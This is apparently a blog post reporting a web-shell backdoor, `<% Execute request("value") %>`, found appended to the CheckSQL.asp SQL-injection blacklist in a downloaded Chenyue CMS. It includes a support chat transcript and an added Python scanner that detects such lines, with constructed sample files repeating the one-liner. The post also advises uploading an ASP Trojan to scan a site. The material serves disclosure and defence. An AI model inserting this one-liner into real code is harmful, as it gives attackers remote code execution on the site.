Alimail
Last night I downloaded a copy of the Chenyue Network enterprise website management system (v2010) and found something I should not have seen. I will paste the whole of its CheckSQL.asp so you can see what is going on.
CheckSQL.asp:
<%
Dim Fy_Url, Fy_a, Fy_x, Fy_Cs(), Fy_Cl, Fy_Ts
'--- Definitions start ---
Fy_Cl = 2 ' Handling: 1 = show a message, 2 = redirect, 3 = show a message, then redirect
'--- Definitions end ---
'---------- Copyright notice ----------
' Dust Moon SQL general anti-injection V1.0, ASP version
' This program was developed independently by Chen Yue.
' If you have any questions or want the latest version, please contact me.
' Contact QQ: 15253061
' Keep this copyright notice when using the program.
' Reposting this program is welcome.
'-------- All rights reserved by chenyue network --------
On Error Resume Next
Fy_Url = Request.ServerVariables("QUERY_STRING")
Fy_a = Split(Fy_Url, "&")
ReDim Fy_Cs(UBound(Fy_a))
On Error Resume Next
' Collect the parameter names from the query string
For Fy_x = 0 To UBound(Fy_a)
    Fy_Cs(Fy_x) = Left(Fy_a(Fy_x), InStr(Fy_a(Fy_x), "=") - 1)
Next
' Blacklist check on the value of each named parameter
For Fy_x = 0 To UBound(Fy_Cs)
    If Fy_Cs(Fy_x) <> "" Then
        If InStr(LCase(Request(Fy_Cs(Fy_x))), "'") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "and") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "select") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "update") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "chr(") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "delete%20from") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), ";") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "insert") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "mid(") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "master.") <> 0 Then
            Select Case Fy_Cl
                Case 1
                    Response.Write "" ' message text omitted in the post
                Case 2
                    ' Partial code omitted
            End Select
            Response.End
        End If
    End If
Next
%>
<% Execute request("value") %>
The last line made me sad, never mind how the anti-injection code itself is written. That line was certainly not added by me, and I know exactly what it is. I later searched for websites running this system, and about 80% of them had been hit. This is not the first time I have seen a one-liner in a website's source code: I remember another system that also had one added to its released source, and at the time I did not pay much attention. Seeing it again today, I am not sure whether it was added by one of the programmers, but it is very amateurish and far too conspicuous. In the earlier case it was buried in the middle of a lot of code and could not be seen without reading carefully. I later contacted Chen Yue's official customer service, and the answer was satisfactory. Here is the chat record:
Chen Yue 22:58:41
Hello, welcome to the online QQ technical support of www.cyweb.cn. How can I help you?
Alimail 12:49:21
Are you there?
June 12:49:27
Here.
June 12:49:30
Hello, welcome to the online QQ technical support of www.cyweb.cn. How can I help you?
Alimail 12:50:04
What does <% execute request("value") %> in the CheckSQL file mean?
June 12:50:14
?
June 12:50:17
File
Alimail 12:50:26
CheckSQL.asp
June 12:50:46
Don't know
June 12:50:49
Where did you download it?
Alimail 12:51:02
China webmaster Resource Station
Alimail 12:51:26
Http://down.chinaz.com/class/3_1.htm
June 12:51:33
Useless
Alimail 12:51:43
Did you add it?
June 12:53:37
That is a one-liner.
June 12:53:40
A Trojan.
Alimail 12:53:59
I know, but I want to know whether your programmers added it or someone else did.
June 12:54:16
What should we do with it?
Alimail 12:54:37
Oh, isn't that what you added?
June 12:54:55
Which site are you running?
Alimail 12:55:04
I don't think any programmer is lacking in morality.
June 12:55:12
We recommend using the commercial version.
June 12:55:28
Don't say this again when something goes wrong.
Alimail 12:55:29
I downloaded your program yesterday.
June 12:55:53
The free download is not very secure.
Alimail 12:56:57
Well, as long as it wasn't added officially. I hope the system gets better and better.
Alimail 12:57:05
Excuse me
June 12:57:31
(Handshake)
Programmers can always justify a line like this: "it's just a common bit of code, I don't know what this legendary one-liner is", or "that line is just something I put there for convenience", and so on. Whether the purpose was innocent or not, only they know. Are programmers also the legendary hackers? The official answer is that they did not add it themselves, so for now I will take that at face value. I don't want any programmer to be idle or to do anything unethical. As for the consequences, it is we webmasters who suffer: the website we worked so hard on is hit, and we are none the wiser.
Finally, a reminder to webmasters: a free downloadable system can be used, but take at least a quick look at the code first. If you cannot read it, upload an ASP Trojan to your own space and use its built-in scanner to find out which files use dangerous functions.
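The scan the author recommends can also be done without uploading anything to the server: copy the site's files down and search them for the construct that makes a one-liner a one-liner, a VBScript code-evaluation call (Execute, ExecuteGlobal, Eval) fed directly from Request. The Python script below is an added example, not code from this post or from Chenyue Network. Its sample files are constructed: a trimmed copy of the filter above with the appended line stands in for the vendor's real CheckSQL.asp, and the load_tree helper assumes the site has been copied to a local directory.

```python
"""
Offline scan of ASP source for one-sentence web shells.

Added example, not code from the original post or from the CMS vendor. It
flags a VBScript code-evaluation call (Execute, ExecuteGlobal, Eval) whose
argument comes straight from Request(...), the pattern found in CheckSQL.asp,
and reports evaluation of an ordinary variable as something to review.
"""
import os
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    path: str
    lineno: int
    severity: str  # "high": evaluates request data; "review": evaluates a variable
    line: str


# Execute/ExecuteGlobal/Eval followed (optionally through a parenthesis and
# whitespace) by Request, Request.Form, Request.QueryString, and so on.
EXEC_FROM_REQUEST = re.compile(
    r"\b(?:execute|executeglobal|eval)\b\s*\(?\s*request\b", re.IGNORECASE)
# The same functions applied to an identifier (ExecuteGlobal sCode,
# Server.Execute sPath): not proven malicious, but worth a manual look.
EXEC_FROM_VARIABLE = re.compile(
    r"\b(?:execute|executeglobal|eval)\b\s*\(?\s*[A-Za-z_]\w*", re.IGNORECASE)
# Full-line VBScript comment, with or without a leading <% delimiter.
COMMENT_LINE = re.compile(r"^\s*(?:<%\s*)?(?:'|rem\b)", re.IGNORECASE)


def scan_source(path: str, text: str) -> List[Finding]:
    """Return one Finding per suspicious line of one ASP/VBScript source."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if COMMENT_LINE.match(raw):
            continue  # commented-out code is not live code
        if EXEC_FROM_REQUEST.search(raw):
            findings.append(Finding(path, lineno, "high", raw.strip()))
        elif EXEC_FROM_VARIABLE.search(raw):
            findings.append(Finding(path, lineno, "review", raw.strip()))
    return findings


def scan_tree(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of relative path -> file contents, in path order."""
    findings: List[Finding] = []
    for path in sorted(files):
        findings.extend(scan_source(path, files[path]))
    return findings


def load_tree(root: str, exts=(".asp", ".asa", ".inc")) -> Dict[str, str]:
    """Read every ASP-like file under a local copy of the site (assumed path)."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return files


def report(findings: List[Finding]) -> str:
    """Format findings as 'severity path:line: code'."""
    return "\n".join(f"{f.severity:6} {f.path}:{f.lineno}: {f.line}" for f in findings)


# Constructed samples (not the vendor's actual files): a trimmed copy of the
# filter from the post with the appended one-liner, a clean include whose only
# "Execute" is in a comment, and a plugin loader that evaluates a variable.
SAMPLE_FILES = {
    "CheckSQL.asp": (
        "<%\n"
        "' Dust Moon SQL general anti-injection V1.0 (trimmed)\n"
        "On Error Resume Next\n"
        "Fy_Url = Request.ServerVariables(\"QUERY_STRING\")\n"
        "Fy_a = Split(Fy_Url, \"&\")\n"
        "%>\n"
        "<% Execute request(\"value\") %>\n"
    ),
    "conn.asp": (
        "<%\n"
        "' Execute is mentioned here only in a comment\n"
        "Set conn = Server.CreateObject(\"ADODB.Connection\")\n"
        "conn.Open connstr\n"
        "%>\n"
    ),
    "inc/plugin.asp": (
        "<%\n"
        "sCode = GetPluginCode(pluginId)\n"
        "ExecuteGlobal sCode\n"
        "%>\n"
    ),
}

if __name__ == "__main__":
    print(report(scan_tree(SAMPLE_FILES)))
```

Run against a real copy with `scan_tree(load_tree("/path/to/site"))`. A "high" hit is a web shell until proven otherwise; a "review" hit needs a human to trace where the variable comes from, since legitimate plugin loaders and template engines also evaluate code.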
Now, the Internet is better than Xin Chun!